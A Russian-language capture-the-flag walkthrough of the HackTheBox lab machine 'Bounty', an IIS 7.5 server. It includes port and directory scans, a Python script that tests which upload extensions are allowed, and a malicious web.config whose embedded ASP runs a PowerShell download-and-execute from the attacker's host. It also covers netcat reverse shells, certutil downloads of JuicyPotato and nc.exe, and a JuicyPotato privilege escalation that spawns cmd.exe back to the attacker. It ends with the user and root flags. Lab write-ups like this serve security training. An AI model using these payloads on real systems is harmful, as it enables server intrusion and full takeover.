Обзор сервисов
Проведем сканирование портов с помощью nmapAutomator
и gobuster
:
$ nmapAutomator.sh -H 10.10.10.93 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
$ gobuster dir --url http://10.10.10.93/ -w /usr/share/dirb/wordlists/common.txt -x asp,aspx,txt,pdf
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
Скрипт
Пробуем написать скритп для страницы: http://10.10.10.93/transfer.aspx
$ nano checker.py
#!/usr/bin/python3
import requests
import sys
import re
from bs4 import BeautifulSoup
url = "http://10.10.10.93/transfer.aspx"
filename = "extension.txt"
def upload(f):
s = requests.Session()
r = s.get(url)
#if r.status_code == 200:
# print("[INFO] Checking...{0}".format(f))
#else:
# print("[ERROR] Can't connect...")
# sys.exit(1)
p = BeautifulSoup(r.content, "html.parser")
viewState = p.find(attrs = {'name' : '__VIEWSTATE'})['value']
eventValidation = p.find(attrs = {'name' : '__EVENTVALIDATION'})['value']
postData = {
'__VIEWSTATE' : viewState,
'__EVENTVALIDATION' : eventValidation,
'btnUpload' : 'Upload'
}
uploadedFile = {'FileUpload1' : (f, 'test')}
r = s.post(url, files=uploadedFile, data=postData)
return r.text
print("[INFO] Allowed Extensions:")
for i in open(filename, 'r'):
#print(i[:-1])
response = upload('bigb0ss.' + i[:-1])
if "successfully" in response:
print("[+] %s" % i.strip())
$ nano extension.txt:
png
jpg
php
php5
php7
phtml
txt
html
asp
aspx
exe
config
js
$ python3 checker.py
[INFO] Allowed Extensions:
[+] png
[+] jpg
[+] config
Запишем свою полезную нагрузку в web.config
:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!-- ASP code comes here
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.6/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
Запишем шелл нишанга в shell.ps1
и загружаем web.config
:
python3 -m http.server 80
rlwrap nc -lnvp 1234
curl http://10.10.10.93/uploadedfiles/web.config
Флаг пользователя
PS C:\users\merlin\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.93
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\users\merlin\desktop> type user.txt
e29ad89891462e0b09741e3082f44a2f
Повышение привилегий
Просто воспользуемся JuicyPotato: https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe
На локальной машине:
python3 -m http.server
rlwrap nc -lnvp 1235
rlwrap nc -lnvp 1236
На удаленной машине:
> certutil -urlcache -f "http://10.10.14.8/JuicyPotatoX86.exe" js.exe
> certutil -urlcache -f "http://10.10.14.8/nc.exe" nc.exe
> nc.exe 10.10.14.6 1235
> jp.exe -l 1234 -p nc.exe -a "10.10.14.6 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}
(нужно взять нестандартный clsid для windows 2008 отсюда https://ohpe.it/juicy-potato/CLSID/)
Флаг суперпользователя
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.93
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{27C3F487-28AC-4CE6-AE3A-1F23518EF7A7}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
c837f7b699feef5475a0c079f9d4f5ea